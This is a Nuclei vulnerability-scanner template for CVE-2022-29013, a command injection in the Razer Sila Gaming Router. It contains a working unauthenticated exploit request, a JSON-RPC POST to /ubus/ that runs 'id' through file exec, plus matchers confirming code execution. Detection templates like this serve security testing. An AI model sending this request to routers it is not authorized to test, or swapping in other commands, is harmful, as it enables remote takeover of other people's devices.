nuclei-templates/http/cves/2022/CVE-2022-29013.yaml

52 lines
1.6 KiB
YAML

id: CVE-2022-29013
info:
name: Razer Sila Gaming Router - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
reference:
- https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-29013
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29013
cwe-id: CWE-78
epss-score: 0.83254
epss-percentile: 0.98361
cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: razer
product: sila_firmware
tags: packetstorm,cve,cve2022,razer,sila,router
http:
- method: POST
path:
- "{{BaseURL}}/ubus/"
headers:
Origin: "{{RootURL}}"
Referer: "{{ROotURL}}"
X-Requested-With: XMLHttpRequest
body: |
{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950